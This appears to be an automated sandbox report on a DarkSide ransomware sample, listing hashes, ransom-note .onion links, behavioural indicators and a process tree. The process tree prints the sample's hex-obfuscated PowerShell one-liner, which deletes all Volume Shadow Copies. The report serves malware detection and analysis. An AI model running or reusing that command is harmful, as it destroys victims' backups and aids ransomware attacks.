Analysis
-
max time kernel
73s -
max time network
78s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
13-07-2023 19:21
Static task
static1
Behavioral task
behavioral1
Sample
Darkside.exe
Resource
win10v2004-20230703-en
General
-
Target
Darkside.exe
-
Size
59KB
-
MD5
cfcfb68901ffe513e9f0d76b17d02f96
-
SHA1
766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f
-
SHA256
17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61
-
SHA512
0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c
-
SSDEEP
768:9jjV7Iax7F3DS4/S96/P3rsAc4ci5pwwX5+R4VYY23W5:vx7Fu4/i6/P3rlckx5+R4VDZ5
Malware Config
Extracted
C:\Users\README.75ec1c69.TXT
darkside
http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF
http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Renames multiple (96) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Darkside.exepid process 3036 Darkside.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
chrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133337497344458982" chrome.exe -
Modifies registry class 5 IoCs
Processes:
Darkside.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.75ec1c69 Darkside.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.75ec1c69\ = "75ec1c69" Darkside.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\75ec1c69\DefaultIcon Darkside.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\75ec1c69 Darkside.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\75ec1c69\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\75ec1c69.ico" Darkside.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exechrome.exeDarkside.exepid process 4144 powershell.exe 4144 powershell.exe 1140 chrome.exe 1140 chrome.exe 3036 Darkside.exe 3036 Darkside.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
Processes:
chrome.exepid process 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Darkside.exepowershell.exechrome.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 3036 Darkside.exe Token: SeSecurityPrivilege 3036 Darkside.exe Token: SeTakeOwnershipPrivilege 3036 Darkside.exe Token: SeLoadDriverPrivilege 3036 Darkside.exe Token: SeSystemProfilePrivilege 3036 Darkside.exe Token: SeSystemtimePrivilege 3036 Darkside.exe Token: SeProfSingleProcessPrivilege 3036 Darkside.exe Token: SeIncBasePriorityPrivilege 3036 Darkside.exe Token: SeCreatePagefilePrivilege 3036 Darkside.exe Token: SeBackupPrivilege 3036 Darkside.exe Token: SeRestorePrivilege 3036 Darkside.exe Token: SeShutdownPrivilege 3036 Darkside.exe Token: SeDebugPrivilege 3036 Darkside.exe Token: SeSystemEnvironmentPrivilege 3036 Darkside.exe Token: SeRemoteShutdownPrivilege 3036 Darkside.exe Token: SeUndockPrivilege 3036 Darkside.exe Token: SeManageVolumePrivilege 3036 Darkside.exe Token: 33 3036 Darkside.exe Token: 34 3036 Darkside.exe Token: 35 3036 Darkside.exe Token: 36 3036 Darkside.exe Token: SeDebugPrivilege 4144 powershell.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeBackupPrivilege 4872 vssvc.exe Token: SeRestorePrivilege 4872 vssvc.exe Token: SeAuditPrivilege 4872 vssvc.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeShutdownPrivilege 1140 chrome.exe Token: SeCreatePagefilePrivilege 1140 chrome.exe Token: SeShutdownPrivilege 1140 chrome.exe -
Suspicious use of FindShellTrayWindow 42 IoCs
Processes:
chrome.exepid process 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe -
Suspicious use of SendNotifyMessage 40 IoCs
Processes:
chrome.exepid process 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe 1140 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exeDarkside.exedescription pid process target process PID 1140 wrote to memory of 4788 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 4788 1140 chrome.exe chrome.exe PID 3036 wrote to memory of 4144 3036 Darkside.exe powershell.exe PID 3036 wrote to memory of 4144 3036 Darkside.exe powershell.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 3684 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 444 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 444 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe PID 1140 wrote to memory of 1480 1140 chrome.exe chrome.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Darkside.exe"C:\Users\Admin\AppData\Local\Temp\Darkside.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xe4,0x108,0x7ffa9b449758,0x7ffa9b449768,0x7ffa9b4497782⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2968 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2992 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2240 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4568 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4640 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4880 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5024 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3636 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5252 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 --field-trial-handle=1888,i,9885487885621947063,14788044467998002490,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datFilesize
40B
MD5880c21cbeec4763c2329dcc899884778
SHA1ce117bbe995d618e50d5aec8770325669b9994ad
SHA256419f688b81c7080ee8f92fd23d0db8786ae07df431e1f60adbfc314a6e5b043a
SHA51295ee960bbd1b822aa7ffa35bb23e374df7bdfbda1ff0d401b0c329c0af8dd8d2b6689464f66829f71829e77f012848c69e12c8b5837bad140db73a3f16bd530b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0Filesize
44KB
MD5e055a81367995008a256f0c8fed2b5ea
SHA1424ffd06de01bd3b866b4db1eef14920556f59d2
SHA256fde7dc7a10f6c01a597955d6960256ea2daf122322a0655ca2e72cc4e736d983
SHA512ad9938ad03034083f874e3bd1dab7d1d6c0b4d2edbceb04db86deb1701d68f38819ee94b68c8ca3fbe2b77f291ebcc9bf2b5e6e049b618539688287e1c8f6b9f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1Filesize
264KB
MD59afeffb063be76e6fb158931ff3736c6
SHA1dda96152cc99162e8142cb0def669aa59c791d39
SHA256e8a5b09a68da5b6258f7a1e6c184a356af414a37dbb0036a7ef90447f4e2f16a
SHA5125eb7b5a1a39c4aec866e2c73c17696e048c35ad782f5adf461c7f9217f6335a8be8619d05895afc95f5ef8aa112b53c760519e84c460d1ed1d172d6823a59312
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_3Filesize
4.0MB
MD5a912318f5e26b8eb88f3101f8428fc02
SHA1cac121d6008bc81c976ebb3e963e95bd9c88a19b
SHA25616d82d6f475ee6dafa0092ae8b6e32822d61dbf5e6987a0138d73910c97f292a
SHA51272d571e9eba44cf14bfd42de0add9dfd5f314bca0da148646c55592ba468be34789c25e1c41d31b1921c18000f4665c0006de081e8f2c6c6bba00f197ce734ba
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005Filesize
103KB
MD50cb83a19972490d824dd06d1d5a1faf7
SHA13ca3905788ee38bb7997489c6f37b972abc43338
SHA256d603f52764b8ad718b6554e5a08c86130cdf3d28a72b8c4912e8cf68f28738b9
SHA5129b3b53c9a2f8a99ec5d9b1a90f31a9a39ec4b725e7b4fc33a78371a48f90c24763d5d7b918bf9131ea7b44dee3c0ff92057273a639c5b9ff363c407fb126b465
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006Filesize
37KB
MD525f93fe15d5e4f7f0290f150d3427454
SHA198ef98b2f1522199162bb0fd39d73d6beddf9aa2
SHA25659c8dcd6763cae33b9a253100a789e48b12aa27783fd49c98701e7004a431296
SHA5123a2dcd3530230c1667c46844d4ac75519ed8e281bb84517fa019264251fdd57c6e44557b480579f923273518c48e3dc38b9b36e7a815c43f5db9d5a9e8035757
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007Filesize
54KB
MD5661a50756bda6ef8a634f92b43b81fdb
SHA19f22cb3fddb22933bd6b1a9affaff57646105cd6
SHA2569ce18e60b8c9a312d4a2064a8f2c1b1fa6cd5c3ea260bf0617266755115d4058
SHA5123fa412dea07401ab30453fdf0303ecce7e876b7ac269c7ecb77fb7b79219f2ece82b4ea84e5c9975de507e1596edef05a34fa95157d6e7e65799c7a94fcf5e0b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOGFilesize
317B
MD55b6f7fb1e5f5a3b70cf4d490e2814fd2
SHA13b5f1476b73c5f79a19d6f82d45ff5d14fecee4c
SHA2564ab57476449cde671fefcbe4672c4c5809f89426b89240c53a9af90705de98b3
SHA512c268f11f1bebcb835ec5b061cb94d5a4b4f01d546e0b78876e31605ed9ebe2f09f0fade1cbd663194041abf7791e941eb7acb23096c96baa5a7eb30deaa1aa65
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGFilesize
332B
MD5579a559edb867de1ed83a6b21d651b41
SHA15e888aad274edca845b3d6e60bf403fa8d2b0cf0
SHA256ef4e2d25ce73488d613bf57ed51af49ba5989c6a8d767ff7689418ac87d9cf9b
SHA512b89a16c8f29c788f0de30c1c25490523a2c517bdb2ffaeb4ee46328c70eb9fb4d4776c088974aeb338ac3597f3bac5742082820da8302675ddb174318251ea90
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
371B
MD5bf8f4b827af70fccb96567d705734258
SHA15e632cf9980322ebbd42b3a5f845a25c3c9efb82
SHA2569bae1af0dab8f3059fa227be437b65a058cf05108f1475b75e3490ef2b27c63c
SHA51299bae16d788aa896b970e74f1f4af0e0ffc8deeb24b22c648f57569593f828ad64a565ace5fd650bcd88460cd1782b39e0775fe19591411a453550739259f3cd
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD5d94f0c765c4e512ec30c6e9c68674290
SHA11decb04a012cbccacfe384a8e3803dd97f240ae4
SHA2562f65ecbc065cb2c9128fb83e40f8580f3db0b1fc044f7ada1bd4f21dbb5017bc
SHA512c7741fc1a429c37f00963193959b6841fb481c15b0cab17adfa6486b174b1b0768357b39d71152773caa4840aa692bd38280395b2dd2a800bfa1fd489a18a51b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD523ee79834ce12c10c687db6f79d3c0e6
SHA1f7e30f81964fb5b6da880cb0e6039da5bd06e0c3
SHA25660330083042c2bd1dabaaa57b821688ae55778a5b10f156a2b99ceeb39726eb9
SHA5124f12ef51365011f94347cb61f5c1a615acf9cd7b72ae35d51484d264f6fd0a2f7bf496db80f453b079780c42b39db5286f19ec4981ad42d583643187c97aa6f6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD5b686a2764ff5aa6b4f4fb697db4ad20c
SHA1867264fd252074b49160fc0d415ffe23bd45f044
SHA2561c24fdaac1a2f9408858fcd5ee3015e654c18bd2bf867a0014d6785503d4ba01
SHA5125e38e9d1102665d96b2a8143b9b7a37cc8ea89289d8e1cbc73c642599586c7014e4e9d3ff41556ac0b337f41a4d2c48ce53e350db62886d4f9f6aadc41766377
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Search Logos\dark_logoFilesize
50KB
MD5975f43f48556969987a9a09408c0819a
SHA1067e563d0e63a7a94736c5d8a970148c5abe68ef
SHA2565bc49c5c2e1fe42a2ad5b25cb8bf2fdd89d3c78d37db2862bf3a6cc0150d406d
SHA512b061859c25c20ae69581d18cca03c5f0586eac93bc9bf5f4ef6c23d038d7a802add4210d7733b37fc649465beb7cabbb5c7c15685cef4126f4eee490d563a8b3
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Search Logos\logoFilesize
49KB
MD5705a2c2c02ef0a671e1bbb49ab9bd67f
SHA1520af30faafe51d3e6903b444819bbcd041cd1b1
SHA256659a38a50f9722e002e7bc36f3fb3bdcf795714624cb220dfdf28935397eb462
SHA5129569a55024330223aec2584cdc0320684d0d7453d5a2e7d1fe620b63f5963161f3605bee0247ff802206e50c974edf14c88796d02b7720836a2d1fb69cf20bf8
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Search Logos\metadataFilesize
1KB
MD537919c876a767da1de2af1bc5bc4878a
SHA18675c11e029f62714108c3a3d6da264ef17e0fb3
SHA256c64ecb8af1f0631f4e95664cf86fa70d49aa9fc4c6eb094069c2338a424eb2a6
SHA5125cd40b6e463d8bc31a0444dcfe9187aa123e79b2b6a836d61143e51818e0cc4310089eacf96f8561ff68b4113bd7a4755deec7091cad2a32a1d03f01b6ef66e7
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
15KB
MD5a27330eea45dd2c274e2030346a89c94
SHA13dbc5faf20e2d6ff0eadc701d4872bc1c8f378c6
SHA25670647952b638685ce4d1d3540bb72982990ee418169843bb99a8e726c4d2b245
SHA51209f6d4b3d95700fec30e7b208037ddee3e5d3bab4de6d80b1ffbf3f77eb5ad56c0f2139b3cfe267b0527c4274c98b97ab29b77aca03353be0ac11513f697e3a9
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.logFilesize
194B
MD5d7d9437445aa960dcea52ffe772822dc
SHA1c2bbf4ac0732d905d998c4f645fd60f95a675d02
SHA2564ff49903bec1197017a35995d5c5fc703caf9d496467345d783f754b723d21c1
SHA512335eb1ba85670550ed1e1e4e14ea4b5d14f8306125bf147a42de4def5e5f75f14c422b014414030cf30378c04f748ac875cf056adda196511a0b057b3598fe9a
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOGFilesize
317B
MD5d17b352071d210c16bd6218f820bc893
SHA18c9d316175dd4e2aa0d6de448064f1da51c49f9d
SHA256d21ed51b08f304fafd23deb34975f7b9c4342ac5ca88c339fcf3a27bf508b690
SHA5120018c455fbe0eb1e97d6183d2c12fe50c43eae776dbb4fa867551ee4225d31cc84d744ba750cf1fd6742d3954e26d7bd1c56408d09d3e86dd7e911920d860d6c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13333749732431964Filesize
2KB
MD5734007506acc80dd366321cacb8e69ad
SHA1eddb3c4fe47a69be85a8aadd856b7eec70f48c24
SHA25671fbf4d1f768228c03b7a8a1938e2fabe5ad11786a04ced800aa91912b011c5f
SHA512e5a8cbde996ff9afb2c8708f5f56e6bbf7db24e4706bfad19144876cacb4c9a71197175833942780e7c17ea18cebc0945a3a0150ac41db986faf74f91d0ae1e2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOGFilesize
345B
MD50db065fc51c4447c7f4eb5f5216dbd17
